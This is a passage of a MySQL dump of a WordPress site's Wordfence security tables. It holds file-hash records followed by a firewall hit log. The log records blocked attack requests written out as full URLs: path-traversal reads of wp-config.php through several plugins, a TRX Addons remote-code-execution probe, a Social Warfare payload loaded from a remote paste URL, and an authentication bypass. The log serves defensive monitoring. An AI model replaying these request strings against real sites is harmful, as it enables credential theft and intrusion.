<�?�=�{H\r','.���G��oT���;hLwM�u��XQDq����','',0,'?'),('��a��\'@T瑓����','wp-admin/images/date-button.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v!0ϝ$�\n-潮L��T','h�ŵδ䘼��n$����������q!I#�','',0,'?'),('��6�\n��I=K�$�','wp-content/plugins/wordfence/css/jquery-ui.min.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}O�^�0tGG��Q','�ٍ$rb=p�h�x�K��5]8�Q���R��jn4','',0,'?'),('�낏\r?8[9�kQ\'s','wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!7�r��ey�s�\Z','@�}�\n�y.\'w�,�5�e\"FE�Yb�v@�.','',0,'?'),('�\'T����́��Y�Ǚ','wp-includes/customize/class-wp-customize-cropped-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�p[�q}y��1�','�x\r:����}��gR)�`�����k�M%','',0,'?'),('�����)z]!?��a�','wp-admin/images/media-button-video.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>���u��e�w�J','Y�e���\"n+�#@���Ƽ�Z���g�VP��\'','',0,'?'),('�%|ݽ�>?v{j��','wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��=�l���	2�X��','״�0���M\"��r,_�Ǝ>)G�����wg?','',0,'?'),('�/e\n��o�?}m�bK','wp-includes/blocks/page-list/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','In�/�{�{\0�=a�b�','ʅM���lw�qd�a�\nN4� `Ī:�4���','',0,'?'),('�F�%��C��0����,','wp-admin/css/list-tables-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M���J�운@I�Q�Z','F[6\r�BN�J+ϓ�2v��{&��.I��~ù��e','',0,'?'),('�I\"�p��t�Q��[Z6x','wp-includes/css/admin-bar.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<�y(w�6}Y��$�','x�\0+���gb0������2Q&ս�q�8�L�','',0,'?'),('�L�oA7��ev	','wp-includes/blocks/loginout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Y�70��G���','�3v�7�|�E��}4�%�������Ȱ����','',0,'?'),('�ZV�Z@�Z�9�d8','wp-content/plugins/wp-cerber/assets/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ma�R�2��!�v�','�X�9�C=JBG�ҋNW;��\"?>�f��','',0,'?'),('�c��wk�(���4�3�','wp-admin/includes/list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��3��|�ca��','b��F|{s4s��.& ;\r^�����f���','',0,'?'),('�gV���HIw��!���','wp-includes/css/customize-preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ig`��o���ӏٷ1>','�>kdU���������=@R���\r����;�','',0,'?'),('�y.{�uJߠ5�[�\Z.','wp-includes/blocks/more/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�ꦗ+�H)�6��','�-d7������v[p�ν��Pk4ݍ��s\"','',0,'?'),('�|��O�<VX���@','wp-content/plugins/wp-cerber/assets/flags/af.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qW_\"�.�z�A�a','X�+��$@yU��g��!��NSζdP����','',0,'?'),('�}��A��5� PԆ��','wp-includes/blocks/gallery/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ta�V�ˋ=\\\0��o7w','��!=@�:&��P\0ay��3�����([a�','',0,'?'),('�Qֿ6��yq�88','wp-includes/theme-compat/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�8��y̻�@�B�5','][����ۭ�}�ߟv{�c�vҧ{P��K1~��','',0,'?'),('��+S�S�=o�)��I�','wp-content/plugins/wp-cerber/assets/magnific/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a3HWX\0\'A�l&�','DQ�Z7ӳ\r�[�G���#q�#W14��W��f','',0,'?'),('��j_�G�o�pza','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-deactivation-tasks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N� ���=���)+�t�','Z�^�BzeISb�pцϺ�	�}��{~YB�v','',0,'?'),('�šͪ(���av�^�','wp-content/plugins/redirection/api/api-group.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q���z5}(����','�K�����=(���|(��͗�k�Aie�;7�','',0,'?'),('���w��\'�6)','wp-includes/rss-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' xr�6�2�\'�]�e�l#','�~^Ɏf}n���Bh��i=F�\n�	��^�,','',0,'?'),('����N��9�{�;','wp-includes/js/mediaelement/wp-mediaelement.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',m;V*H��Tt���~X�','��a�ԋRY哝���a����<�n[G{=y3�? ','',0,'?'),('��.���I�\nfq�M9','wp-includes/sodium_compat/src/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�i��L�V=X+�	v0~','4��-<4�,\"V�ȱXʘî�hR�	K�F�k�','',0,'?'),('�\"U�F~B�.��S','wp-includes/blocks/video/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gv���B��pH��=�','��,��TD]��� �����BM���6ꗎ�5Q�','',0,'?'),('�)�n���k?5�?\Z�','wp-content/themes/newsmagbd/vendors/jquery.bootstrap.newsbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ze�t�ΣR	ݎ�','�)e�@�ٸ%�f��83z�0�R�Nl�P��F','',0,'?'),('�;`�$r���$���=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p�G�I�t*����Np=','����*�/���Ⱦs��t�A����}.b\'\\','',0,'?'),('�E58��y���Ws�O��','wp-admin/css/admin-menu.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�lI2����f���^P','�g\0N�]��Jw�\0��S�2�)(�U�E���z�W�','',0,'?'),('�L����e5x?e=�&','wp-includes/js/plupload/wp-plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@���nXǑ��i)','�>�#�ci�5��ct6�\"����w�)�','',0,'?'),('�QS�2�#��]�srt�','wp-includes/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>����ͯ\ZHdy��4','-�ڣ���|A\rc���w��H4�Up����c�','',0,'?'),('�k����PP��1<�','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ou�l��_�4@��','6b% �\"�ʴs�J�p3����8ӷ�SǙ:����','',0,'?'),('��HF)\\�,�b�','wp-includes/js/jquery/ui/controlgroup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('��~%B�\0�z���?o','wp-includes/IXR/class-IXR-message.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�/�z�*�zͷ�;','lG\'��r5���+�̔Mh�Shq>��	\0Ϧ','',0,'?'),('��a5[4�5�Me�pC','wp-includes/js/jquery/ui/effect-bounce.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�&�@��ڧrZ','�%MdžP��˧��3d(q��r�)i�x�>�','',0,'?'),('��S�CRC��l��','wp-admin/css/colors/sunrise/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V��\Z�z�	h��=�','��Q_n��97�L2��$��y:j�Sх����','',0,'?'),('���߹u7���[)�h','wp-includes/blocks/embed/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�x�x�-�2ggo','Շ��u�)��q\"��S\'�s�`֪9��~d`�','',0,'?'),('���k��i��.���\\��','wp-includes/images/smilies/icon_neutral.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��VM3HU1!�v','���Ois8\0�|z��6�]e��@Y�m49','',0,'?'),('��4�5��q-��p,��','wp-includes/blocks/file/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6,�@A��cɃ��','*�\"U �6O~4��~l����h�=�Wְ}!I�','',0,'?'),('��©6��<��\09ZiR','wp-includes/js/jquery/ui/effect-fade.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rs�J��7O,��','O#W�V�}��+<������Ϭ>!�����','',0,'?'),('���@~}c���Q�\'��J','wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�9��;%��mM6Z','6�-�2�Xjݒ[�l��ÆL	\'8FJ','',0,'?');
/*!40000 ALTER TABLE `wp_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhits`
--

DROP TABLE IF EXISTS `wp_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=205 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhits`
--

LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (10,0.000000,1627425085.333241,'\0\0\0\0\0\0\0\0\0\0��6D �',0,200,0,0,0,'https://www.westonspirit.org.uk/?_wfsf=detectProxy','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1','scan:detectproxy',NULL,NULL),(11,1627583714.859128,1627583714.752600,'\0\0\0\0\0\0\0\0\0\0���7L�',0,403,0,0,0,'https://westonspirit.org.uk/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttbGFfZG93bmxvYWRfZmlsZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tZWRpYS1saWJyYXJ5LWFzc2lzdGFudC9pbmNsdWRlcy9tbGEtZmlsZS1kb3dubG9hZGVyLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(12,1627583714.708626,1627583714.616300,'\0\0\0\0\0\0\0\0\0\0���7L�',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(13,1627583714.549373,1627583714.417600,'\0\0\0\0\0\0\0\0\0\0���7L�',0,403,0,0,0,'https://westonspirit.org.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(14,1627591436.962999,1627591436.867400,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://westonspirit.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1}'),(15,1627624055.645728,1627624055.567500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(16,1627624062.057163,1627624061.979400,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(17,1627624060.678501,1627624060.598000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(18,1627624067.584135,1627624067.511100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(19,1627624093.002673,1627624092.922500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(20,1627624092.327898,1627624092.251800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(21,1627632683.242611,1627632683.155200,'\0\0\0\0\0\0\0\0\0\0���7��',0,403,0,0,0,'https://westonspirit.org.uk/wp-json/trx_addons/v2/get/sc_layout?sc=print_r',NULL,'python-requests/2.18.4','blocked:waf','TRX Addons >= 1.6.50 - Remote Code Execution','{\"learningMode\":0,\"failedRules\":\"209\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"path\":\"L3dwLWpzb24vdHJ4X2FkZG9ucy92Mi9nZXQvc2NfbGF5b3V0\",\"category\":\"rce\",\"ssl\":1}'),(22,1627634318.790469,1627634318.713100,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(23,1627634325.109539,1627634325.034300,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(24,1627634323.717074,1627634323.641600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(25,1627634331.118631,1627634331.043600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(26,1627634356.865610,1627634356.748500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(27,1627634356.132959,1627634356.059600,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(28,1627639447.539188,1627639447.451500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(29,1627639453.218572,1627639453.142200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(30,1627639451.856907,1627639451.777000,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(31,1627639459.205746,1627639459.120200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(32,1627639486.356482,1627639486.277500,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(33,1627639485.657688,1627639485.583200,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(34,1627669587.499651,1627669587.393800,'\0\0\0\0\0\0\0\0\0\0��4�6',0,403,0,0,0,'https://www.westonspirit.org.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site 